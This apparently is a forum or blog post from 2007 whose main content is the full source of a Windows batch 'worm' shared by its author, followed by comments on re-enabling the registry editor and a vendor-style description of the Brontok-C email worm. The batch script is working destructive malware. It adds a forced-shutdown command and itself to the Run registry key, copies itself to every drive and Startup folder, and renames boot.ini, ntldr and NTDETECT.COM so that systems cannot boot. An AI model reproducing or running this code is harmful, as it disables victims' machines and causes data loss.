Anatomy of an worm written with plain windows batch commands


On 8/26/07, Shezan <shezan2k7[at]gmail.com> wrote:
I created it with Notepad. I actually created a MS-DOS .bat file using notepad and then converted the shezan.bat file to .exe using using a bat2exe software.. Its nothing . kono bhabe jora tali die baniechhi… Check the source code…..
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! that you’ve found a great security hole windows has. Its a security hole because Windows lets the program change certain settings without making precautions. Have you tested the renaming part of this?
Now listen.. its nothing near to virus. Its just a malware. Virus needs lots of capability to be called as a virus. Replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can though be called as an worm.
Antiviruses detect it as those test in heuristic mode…

How do you enable Registry Editing again if it has been disabled by your administrator?


A way to get into the registry editor if its been disabled, heres how you do it:

1. Disable as much as you can from your startup. Remove programs from your startup folder and such, so as not to lag down the bootup process.

2.Create a new shortcut on your desktop, point it to “C:\Windows\regedit.exe”

3.Log off, then log back on

4.As soon as you see your desktop, double click on the shortcut. The system does not check for policies until a few seconds after it booted up. If you click on the icon fast enough, it should let you get in.

After that, do all you need. After you close it though, it will not open unless you redo step 3 and 4.

 

There’s one vbs script to enable the registry editing. and below is the link.

www.dougknox.com/security/scripts_desc/regtools.htm

The way to get into registry editing is simple. Open your start menu click Run and paste in the folowing command: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f Submited By HaXxOr.

Administrator does not disable registry editing its the bloody virus called rontokbro@mm. you can remove the virus but enable registy editing you will need the tool provided by symantec on their web site http://securityresponse.symantec.com/avcenter/venc/data/tool.to.reset.shellopencommand.registry.keys.htmlyou can also learn about rontokbro@mm on this site. 1)download the inf file 2)rightclick it and choose install appearently nothing happens but amaizingly registry editing is enabled type regedit on command prompt or RUN and enjoy. muzammal baig.

This section is for technical experts who want to know more.

W32/Brontok-C is an email worm that sends itself to the addresses gathered from the infected computer, skipping email addresses that contain the following strings :

PLASA,TELKOM,INDO,.CO.ID,.GO.ID,.MIL.ID,.SCH.ID,.NET.ID,.OR.ID,.AC.ID,.WEB.ID,.WAR.NET.ID,ASTAGA,GAUL,BOLEH,EMAILKU,SATU

W32/Brontok-C may arrive attached with a filename randomly chosed from the following :

winword.exe kangen.exe ccapps.exe syslove.exe untukmu.exe myheart.exe my heart.exe jangan dibuka.exe

The email is sent with a blank subject line and the following message text :

— Hentikan kebobrokan di negeri ini — 1. Penjarakan Koruptor, Penyelundup, Tukang Suap, & Bandar NARKOBA ( Send to “NUSAKAMBANGAN”) 2. Stop Free Sex, Aborsi, & Prostitusi ( Go To HELL ) 3. Stop pencemaran lingkungan, pembakaran hutan & perburuan liar. 4. SAY NO TO DRUGS !!! — KIAMAT SUDAH DEKAT — Terinspirasi oleh: Elang Brontok (Spizaetus Cirrhatus) yang hampir punah By: HVM31 — JowoBot #VM Community — !!! Akan Kubuat Mereka (VM lokal yg cengeng & bodoh) Terkapar !!!

When first run W32/Brontok-C copies itself to:

\Local Settings\Application Data\csrss.exe \Local Settings\Application Data\inetinfo.exe \Local Settings\Application Data\lsass.exe \Local Settings\Application Data\services.exe \Local Settings\Application Data\smss.exe \Local Settings\Application Data\winlogon.exe \Empty.pif \Templates\Brengkolang.com \ShellNew\sempalong.exe \eksplorasi.exe \repclient1’s Setting.scr

W32/Brontok-C will create a remote task in the following location in order to run a copy of itself on a daily basis to maintain infection :

\Tasks\At1.job

W32/Brontok-C attempts to download files from a remote website to the following location :

\Local Settings\Application Data\ListHost11.txt \Local Settings\Application Data\Update.11.Bron.Tok.bin

At the time of writing these files were unavailable from the remote website. The following registry entries are created to run W32/Brontok-C on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus \Local Settings\Application Data\smss.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus \ShellNew\sempalong.exe

The following registry entry is changed to run eksplorasi.exe on startup:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Explorer.exe “\eksplorasi.exe”

(the default value for this registry entry is “Explorer.exe” which causes the Microsoft file \Explorer.exe to be run on startup).

The following registry entry is set, disabling the registry editor (regedit):

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools 1

Registry entries are set as follows:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoFolderOptions 1

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableCMD 0

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden 0

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HideFileExt 1

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden